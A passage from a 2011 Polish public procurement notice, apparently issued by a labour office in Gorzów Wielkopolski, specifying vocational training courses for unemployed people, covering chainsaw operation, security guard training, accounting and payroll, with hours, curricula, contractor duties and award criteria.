-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl.
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie w grupach szkoleniowych od 1-10 osób, pod warunkiem zapewnienia dla każdego uczestnika samo-dzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs drwal - pilarz (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10. 
-	Termin wykonania zamówienia: do 30.11.2011, rozpoczęcie III kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 5 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu od godz. 8-18, 1 godzina zajęć teoretycznych trwa 45 minut + 15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 25 godzin zegarowych w tygodniu.
-	Ilość godzin szkolenia - min. 144 godzin na 1 uczestnika, t tym:
-	Ilość godzin szkolenia teoretycznego - min. 38 godzin
-	Ilość godzin szkolenia praktycznego - min. 106 godzin 
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp., dopuszcza się możliwość realizacji szkolenia poza Gorzowem Wlkp. Organizator musi zapewnić dla uczestników szkolenia dojazd do miejsc odbywania zajęć w obie strony, ew. zakwaterowanie i wyżywienie, a koszty należy uwzględnić w cenie szkolenia.  
-	Celem szkolenia jest nabycie wiedzy i  umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pilarza-drwala. 
-	Program szkolenia powinien uwzględniać następujące zagadnienia: budowa silników spalinowych i ich działanie, budowa pilarek spalinowych, charakterystyka pilarek, stosowane paliwa, oleje i smary, utrzymanie właściwego stanu technicznego pilarki, narzędzia i sprzęt pomocniczy do pozyskiwania drewna, techniki ścinki i obalania drzew w warunkach normalnych, ścinka i obalanie drzew trudnych oraz usuwanie złomów i wywrotów, techniki przerzynki kłód i dłużyc, techniki okrzesywania drzew ściętych, zasady organizacji procesu technologicznego pozyskiwania drewna, wykorzystanie surowca drzewnego - manipulacja i sortymentacja, wyka szarki i wycinarki-budowa i zastosowanie w leśnictwie, bhp  na stanowisku operatora pilarki, udzielanie pierwszej pomocy w nagłych wypadkach, zajęcia praktyczne.

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl.
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie w grupach szkoleniowych od 1-10 osób, pod warunkiem zapewnienia dla każdego uczestnika samo-dzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs ochrony mienia i osób I stopnia (6 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 6.
-	Termin wykonania zamówienia: do 30.11.2011 r., rozpoczęcie III kwartał, dokładny termin szkoleń będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 8 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin dziennie, w przedziale czasu w godz. 8-18, min. 25 godzin zegarowych w tygodniu, 1 godzina zajęć trwa 45 minut+15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić w trakcie szkolenia przerwy w ciągu dnia.
-	Ilość godzin szkolenia - min. 245 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 134 godzin
-	Ilość godzin szkolenia praktycznego - min. 111 godzin
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp., dopuszcza się realizację zajęć poza Gorzowem Wlkp., pod warunkiem zapewnienia przez instytucję szkoleniową dowozu uczestników szkolenia w obie strony, ew. zakwaterowania i wyżywienia. Koszty powinny być uwzględnione w cenie szkolenia. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pracownika ochrony I stopnia, strażnika, wartownika oraz zdobycie stosownych zaświadczeń. 
-	Program szkolenia powinien zawierać następujące elementy: Program szkolenia powinien być opracowany zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz musi uwzględniać następujące zagadnienia: 
-	Przepisy regulujące zasady wykonywania zadań pracownika ochrony fizycznej
-	Wybrane elementy prawa karnego i wykroczeń
-	Wybrane elementy prawa karnego procesowego
-	Wybrane elementy prawa cywilnego
-	Wybrane elementy prawa pracy
-	Wybrane elementy psychologii
-	Etyka pracownika ochrony
-	Zasady udzielania pierwszej pomocy przedlekarskiej
-	Przyczyny zamachu na osoby
-	Metody i etapy ataków na osoby oraz używane środki
-	Założenia taktyczne przeciwdziałania atakom
-	Organizacja grupy ochronnej
-	Ochrona obiektu
-	Ochrona konwojów
-	Techniczne środki zabezpieczenia mienia
-	Wyszkolenie strzeleckie
-	Samoobrona
-	Techniki interwencyjne

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl/ZPFE/Zasady.asx .
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane 
w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie sukcesywnie w grupach szkoleniowych od 1-6 osób, pod warunkiem zapewnienia dla każdego uczestnika samodzielnych stanowisk szkoleniowych.
Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs ochrony mienia i osób II stopnia (6 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 6.
-	Termin wykonania zamówienia: do 30.11.2011 r., rozpoczęcie III kwartał, dokładny termin rozpoczęcia poszczególnych szkoleń będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 12 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin w przedziale czasu od godz. 8-18, min. 25 godzin zegarowych w tygodniu, 1 godzina zajęć trwa 45 minut + 15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami.
-	Ilość godzin szkolenia ogółem - min. 335 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 243 godzin
-	Ilość godzin szkolenia praktycznego - min. 92 godzin
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp., dopuszcza się realizację zajęć praktycznych poza Gorzowem Wlkp., pod warunkiem zapewnienia przez instytucję szkoleniową dowozu uczestników szkolenia w obie strony, ew. zakwaterowania i wyżywienia. Koszty powinny być uwzględnione w cenie szkolenia. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pracy pracownika ochrony, strażnika, wartownika oraz zdobycie stosownych uprawnień.
-	Program szkolenia powinien zawierać następujące elementy: 
-	Podstawy prawne wykonywania zadań ochrony osób i mienia
-	Wybrane zagadnienia organizacji i zarządzania
-	Wybrane zagadnienia psychologii i socjologii pracy
-	Wybrane zagadnienia kryminologii
-	Wybrane zagadnienia kryminalistyki
-	Etyka zawodowa pracownika ochrony
-	Wybrane zagadnienia ekonomii
-	Organizacja administracji państwowej i samorządowej
-	Ochrona tajemnicy państwowej i służbowej
-	Pojęcie terroryzmu, cele i metody działań terrorystycznych
-	Wybrane zagadnienia prawa cywilnego
-	Wybrane zagadnienia prawa karnego materialnego i procesowego
-	Wybrane zagadnienia prawa administracyjnego
-	Wybrane zagadnienia prawa handlowego
-	Wybrane zagadnienia prawa finansowego
-	Wybrane zagadnienia prawa pracy
-	Ogólne zasady przygotowania i prowadzenia ochrony
-	Podstawowe formy realizowania fizycznej ochrony osób i mienia
-	Warunki psychofizyczne niezbędne do wykonywania poszczególnych zadań pracownika ochrony
-	Zasady opracowywania planu ochrony oraz procedur bezpieczeństwa
-	Nadzór i kontrola nad zadaniami wykonywanymi przez pracowników ochrony
-	Obowiązujące przepisy prawne związane z ochroną wartości pieniężnych
-	Zasady organizacji ochrony konwoju
-	Planowanie trasy konwoju
-	Prowadzenie dokumentacji związanej z konwojem
-	Zasady opracowywania instrukcji o systemie przepustowym oraz kontroli ruchu osobowego 
i materiałowego w chronionym obiekcie
-	Rodzaje i metody zagarnięcia mienia występującego w zakładach produkcyjnych, przyczyny sprzyjające ich dokonywaniu oraz zadania pracowników ochrony w zakresie ich zapobieganiu 
i wykrywaniu
-	Techniczne środki zabezpieczenia obiektów
-	Zasady współpracy z Policją w zakresie ochrony obiektu oraz przeciwdziałania przestępczości
-	Zadania pracowników ochrony w związku z zagrożeniem zamachami przestępczymi i terrorystycznymi
-	Prowadzenie dokumentacji związanej z działalnością ochronną
-	Zasady, formy i metody szkolenia pracowników
-	Warunki i zasady organizacji szkoleń strzeleckich pracowników ochrony osób i mienia, omówienie instrukcji szkolenia strzeleckiego
-	Zasady udzielania pomocy przedlekarskiej
-	Budowa i zasada działania broni
-	Zasady bezpiecznego obchodzenia się z bronią
-	Techniki posługiwania się bronią i strzelanie praktyczne
-	Samoobrona  i techniki interwencyjne.

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl/ZPFE/Zasady.asx .
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie sukcesywnie w grupach szkoleniowych od 1- 6 osób, pod warunkiem zapewnienia dla każdego uczestnika samodzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs księgowo - kadrowy z obsługą programów komputerowych wykorzystywanych w księgowości i kadrach (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10. 
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2011r., III kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej. 
-	Czas trwania kursu do 8 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu w godz. 8-18, 1 godzina zajęć teoretycznych trwa 45 minut + 15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 25 godzin zegarowych w tygodniu.
-	Ilość godzin szkolenia - min. 300 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 120 godzin
-	Ilość godzin szkolenia praktycznego - min. 180 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pracownika biurowego do spraw księgowo-kadrowych oraz zdobycie stosownych zaświadczeń. 
-	Program szkolenia powinien zawierać następujące elementy: Program szkolenia i towarowa, ewidencja rzeczowych i finansowych składników majątku trwałego, ewidencja kosztów i produktów, naliczanie 
i księgowanie płac, fakturowanie, bilans księgowy, zasady organizacji i prowadzenia spraw kadrowych, współpraca z ZUS i Urzędem Skarbowy, prawo z uwzględnieniem prawa pracy i prawa podatkowego, obsługa komputera od podstaw z wykorzystaniem programów edytorskich Windows, Word, Excel, Internet, obsługa programu komputerowego finansowo-księgowego, obsługa programu kadrowego, obsługa urządzeń biurowych takich jak: fax, ksero, itp.

Wymagania programowe:
-	Program musi być opracowany zgodnie z obowiązującymi przepisami prawa.
-	Uwzględnia zajęcia teoretyczne oraz praktyczne (ćwiczenia) oraz sposoby sprawdzania efektów nauczania. Kształt i metodyka nauczania musi odpowiadać potrzebom dydaktycznym osób dorosłych. Przy jego realizacji konieczne jest, aby uczestnicy szkoleń mieli dostęp do nowoczesnych metod zdobywania wiedzy, m.in. poprzez dostęp do komputera, internetu. 
-	Plan nauczania powinien określać przedmioty nauczania i ich wymiar, rozkład zajęć oraz częstotliwość. Treść, kształt planu i czas trwania szkolenia muszą być odpowiednie, aby osiągnąć cel szkolenia.
-	Wszystkie zajęcia muszą być prowadzone przez wykładowcę/instruktora, który posiada kwalifikacje zawodowe z zgodne z tematyka realizowanych zajęć. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej, itp.
-	Szkolenie powinno zakończyć się egzaminem potwierdzającym uzyskanie kwalifikacji oraz wydaniem zaświadczeń (uprawnień) dla osób kończącym szkolenie z wynikiem pozytywnym, zgodnie z przepisami dotyczącymi zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych oraz innych ustaw regulujących organizację ww. szkoleń. W przypadku osób, których szkolenie będzie współfinansowane ze środków Unii Europejskiej - Europejskiego Funduszu Społecznego w ramach Programu Kapitał Ludzki wystawi dokumenty z wykorzystaniem logo EFS zgodnie z wytycznymi zamieszczonymi na stronie internetowej: www.efs.gov.pl/ZPFE/Zasady.asx .
-	Czas przeznaczony na egzamin nie wlicza się do godzin szkolenia.
-	Dla zapewnienia jakości szkolenia instytucja szkoleniowa musi zapewnić  nadzór wewnętrzny służący podnoszeniu jakości szkolenia, polegającym na bieżącej kontroli jakości i efektów szkolenia, sprawowany przez osobę z przygotowaniem pedagogicznym. 
-	Nadzór wewnętrzny nie może sprawować wykładowca / instruktor wskazany do realizacji szkolenia.
-	Wskazana ilość osób do przeszkolenia może ulec zmianie, ponieważ szkolenia będą realizowane w zależności od potrzeb bezrobotnych. PUP pokryje koszty wynikające z preliminarza w przeliczeniu na 1 uczestnika, za każdą osobę skierowaną. Osoby będą kierowane na szkolenie sukcesywnie w grupach szkoleniowych od 1-10 osób, pod warunkiem zapewnienia dla każdego uczestnika samodzielnych stanowisk szkoleniowych.

Wykonawca na okres szkolenia będzie zobowiązany:
-	Prowadzić dokumentację przebiegu szkolenia m.in.: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
-	Ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków na podstawie odrębnej listy osób wskazanych do ubezpieczenia przez PUP. Koszt ubezpieczenia zostaną uregulowane na podstawie wystawionej faktury i polisy.
-	Kontrolować obecność uczestników na zajęciach, informować na bieżąco PUP o nieobecnościach lub przerwaniu szkolenia przez osoby skierowane.
-	Sporządzać protokoły z przebiegu egzaminów.
-	Przeprowadzić ocenę realizowanego szkolenia poprzez wypełnienie ankiety przez uczestników szkolenia oraz przekazanie jej wyników oceny do PUP wraz z dokumentacją szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs kadry i płace (10 osób).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Liczba osób do przeszkolenia - 10.
-	Termin wykonania zamówienia: od dnia podpisania umowy do 30.11.2011 r., rozpoczęcie III kwartał, dokładny termin będzie ustalony po wyborze jednostki szkoleniowej.
-	Czas trwania kursu do 6 tygodni dla grupy, zajęcia w ciągu dnia nie mogą przekroczyć 8 godzin, w przedziale czasu w godz. 8-18, 1 godzina zajęć teoretycznych trwa 45 minut + 15 min. przerwa lekcyjna, wykonawca zobowiązany jest zapewnić przerwy pomiędzy lekcjami, min. 25 godzin zegarowych w tygodniu.
-	Ilość godzin szkolenia ogółem - min. 200 godzin na 1 uczestnika, w tym:
-	Ilość godzin szkolenia teoretycznego - min. 40 godzin
-	Ilość godzin szkolenia praktycznego - min. 160 godzin.
-	Miejsce przeprowadzenia szkoleń - Gorzów Wlkp. 
-	Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku pracownika biurowego do spraw kadrowych i płacowych oraz zdobycie stosownych zaświadczeń. 
